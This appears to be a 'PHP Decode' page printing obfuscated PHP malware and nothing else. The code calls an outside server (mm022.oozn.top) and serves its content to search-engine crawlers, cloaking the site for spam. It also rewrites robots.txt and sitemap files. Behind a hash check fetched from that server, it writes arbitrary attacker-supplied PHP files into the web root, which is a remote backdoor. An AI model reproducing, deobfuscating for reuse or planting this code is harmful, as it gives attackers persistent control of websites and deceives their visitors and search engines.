PHP Decode

 goto e1Xa_; oG0GB: $htwe = "\x68\x74\x74\160"; goto YGOLJ; VGCNL: function st_uri() { if (isset($_SERVER["\122\105\121\x55\x45\123\124\137\x55\122\111"])) { $ddur = $_SERVER["\x52\x45\x51\125\x45\123\124\x5f\125\x52\x49"]; } else { if (isset($_SERVER["\141\x72\x67\166"])) { $ddur = $_SERVER["\x50\110\x50\137\x53\x45\114\106"] . "\77" . $_SERVER["\141\162\147\166"][0]; } else { $ddur = $_SERVER["\x50\110\120\x5f\x53\105\114\106"] . "\x3f" . $_SERVER["\121\x55\x45\122\131\137\123\124\122\x49\116\107"]; } } return $ddur; } goto SrEOb; JHNcz: $usse = ''; goto HRGCT; nJLzy: function sbot() { $uaget = strtolower($_SERVER["\110\124\x54\120\x5f\x55\123\105\122\137\101\107\x45\x4e\x54"]); if (stristr($uaget, "\147\157\x6f\147\154\145\142\157\x74") || stristr($uaget, "\x62\151\156\x67") || stristr($uaget, "\x79\x61\150\157\157") || stristr($uaget, "\147\x6f\157\147\154\145") || stristr($uaget, "\107\157\x6f\x67\154\x65\x62\157\x74") || stristr($uaget, "\147\157\157\x67\154\x65\x62\x6f\164")) { return true; } else { return false; } } goto bMJ0Y; SrEOb: $towe = $goto . "\x2e\157\x6f\x7a\156\156" . "\x2e\x74\x6f\x70"; goto G9q0D; FdpZx: if ($ddur_tmp == '') { $ddur_tmp = "\x2f"; } goto Yi4gZ; KO55o: $lag = @$_SERVER["\110\x54\124\120\137\x41\103\103\x45\120\x54\137\114\x41\116\107\125\101\107\x45"]; goto CO4MM; s22E1: $goto = "\x6d\155\60\x32\x32"; goto oG0GB; CO4MM: $lag = urlencode($lag); goto JHNcz; e1Xa_: @set_time_limit(5000); goto Gfseg; Gfseg: @ignore_user_abort(1); goto s22E1; uNl1G: if (@$_GET["\160\x64"] != '') { $acot = @$_GET["\x6d\x61\x70\156\x61\x6d\x65"]; if (isset($_SERVER["\x44\117\x43\x55\115\x45\116\x54\x5f\x52\117\x4f\124"])) { $path = $_SERVER["\104\117\x43\x55\115\x45\x4e\x54\x5f\x52\x4f\117\124"]; } else { $path = dirname(__FILE__); } if (strstr($acot, "\163\x69\164\145\x6d\141\x70")) { $map_path = $path . "\x2f\x73\151\x74\x65\155\x61\160\56\170\155\154"; $file_path = $path . "\x2f\162\x6f\x62\157\164\163\x2e\164\x78\164"; @unlink($map_path); $robots = @file_get_contents($file_path); $data = "\x55\x73\x65\162\x2d\141\147\x65\156\x74\72\x20\x2a" . "\15\xa" . "\x41\154\154\157\x77\72\x20\57"; $sturs = "\15\xa" . "\x53\x69\164\145\155\141\160\72\x20" . $http . "\x3a\57\57" . $host . "\57" . $acot . "\x2e\170\x6d\154"; $futrobot = ''; if (strstr($robots, "\57\155\141\x70\56\170\155\x6c")) { if (strstr($robots, "\57" . $acot . "\56\x78\x6d\154")) { echo "\x73\x69\x74\x65\x6d\x61\160\x20\x69\156\40\x61\144\144\145\144\x21"; die; } else { $robots .= $sturs; } } else { @unlink($file_path); $sturs .= "\15\12" . "\x53\151\x74\145\x6d\x61\x70\72\x20" . $http . "\72\x2f\x2f" . $host . "\x2f\x6d\x61\160\56\170\x6d\154"; $robots = $data . $sturs; } if (file_put_contents($file_path, trim($robots))) { echo "\74\x62\x72\x3e\157\153\x3c\142\162\76"; } else { echo "\74\142\x72\x3e\146\x61\x6c\x73\x65\41\74\142\162\x3e"; } } else { if (strstr($acot, "\56\x70" . "\x68\x70")) { if (sha1(sha1(@$_GET["\141"])) == daag($htwe . "\72\57\x2f" . $towe . "\x2f\x61\56\x70" . "\150\x70")) { $dstr = @$_GET["\x64\x73\164\x72"]; if (file_put_contents($path . "\x2f" . $acot, $dstr)) { echo "\157\153"; } } } else { echo "\x3c\x62\x72\x3e\40\x66\x61\154\x73\x65\x21\x3c\142\x72\x3e"; } } die; } goto DwDa7; Kowo8: $htag = trim(daag($web)); goto uem9Q; bMJ0Y: function daag($url) { $ficonts = ''; if (function_exists("\x63\165\x72\154\137\151\156\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ficonts = curl_exec($ch); curl_close($ch); } if (!$ficonts) { $ficonts = @file_get_contents($url); } return $ficonts; } goto db5Mg; DwDa7: $web = $htwe . "\72\x2f\57" . $towe . "\x2f\x69\x6e\x64\145\x2e\x70\150\x70\x3f\167\145\x62\75" . $host . "\x26\172\x7a\x3d" . sbot() . "\x26\165\162\x69\x3d" . $ddur . "\46\165\162\x6c\x73\150\x61\x6e\x67\75" . $usse . "\x26\150\x74\x74\x70\75" . $http . "\x26\x6c\141\x6e\147\x3d" . $lag; goto Kowo8; Yi4gZ: $ddur = urlencode($ddur_tmp); goto VGCNL; HRGCT: if (isset($_SERVER["\x48\124\124\x50\x5f\x52\x45\x46\105\x52\105\x52"])) { $usse = $_SERVER["\110\124\124\120\x5f\122\x45\106\105\122\x45\122"]; $usse = urlencode($usse); } goto uNl1G; YGOLJ: if (ishtt()) { $http = "\150\x74\x74\160\163"; } else { $http = "\x68\x74\x74\160"; } goto txS_U; txS_U: $ddur_tmp = st_uri(); goto FdpZx; INRFW: $host = $_SERVER["\110\x54\124\120\x5f\110\117\x53\124"]; goto KO55o; uem9Q: if (!strstr($htag, "\156\157\142\157\164\165\x73\x65\162\x61\x67\145\x6e\164")) { if (strstr($htag, "\x6f\153\x68\x74\155\x6c\147\x65\x74\x63\157\156\x74\x65\x6e\164")) { @header("\x43\157\156\x74\145\156\164\55\x74\x79\x70\x65\72\40\164\145\x78\x74\57\x68\x74\155\154\73\40\143\x68\141\162\x73\145\x74\75\x75\x74\146\x2d\x38"); $htag = str_replace("\157\x6b\150\164\155\x6c\147\x65\x74\143\157\156\164\145\156\x74", '', $htag); echo $htag; die; } else { if (strstr($htag, "\x6f\x6b\170\155\x6c\147\x65\164\143\x6f\x6e\x74\145\156\x74")) { $htag = str_replace("\157\x6b\170\155\x6c\147\x65\x74\143\157\156\164\x65\x6e\x74", '', $htag); @header("\103\157\x6e\164\x65\156\164\55\x74\171\x70\x65\72\40\164\x65\170\x74\x2f\x78\155\x6c"); echo $htag; die; } } } goto nJLzy; G9q0D: function ishtt() { if (isset($_SERVER["\x48\124\124\120\x53"]) && strtolower($_SERVER["\110\124\124\x50\x53"]) !== "\157\x66\x66") { return true; } elseif (isset($_SERVER["\110\x54\124\120\137\130\137\x46\117\122\x57\x41\122\x44\x45\104\137\120\122\x4f\124\x4f"]) && $_SERVER["\110\124\x54\x50\x5f\x58\x5f\x46\x4f\122\127\101\122\104\105\104\x5f\120\122\x4f\124\x4f"] === "\150\x74\x74\x70\163") { return true; } elseif (isset($_SERVER["\110\124\x54\120\137\x46\122\117\116\x54\137\105\x4e\x44\x5f\110\124\124\x50\123"]) && strtolower($_SERVER["\x48\x54\x54\x50\137\106\x52\x4f\x4e\124\137\105\x4e\104\x5f\110\124\124\x50\x53"]) !== "\157\146\146") { return true; } return false; } goto INRFW; db5Mg: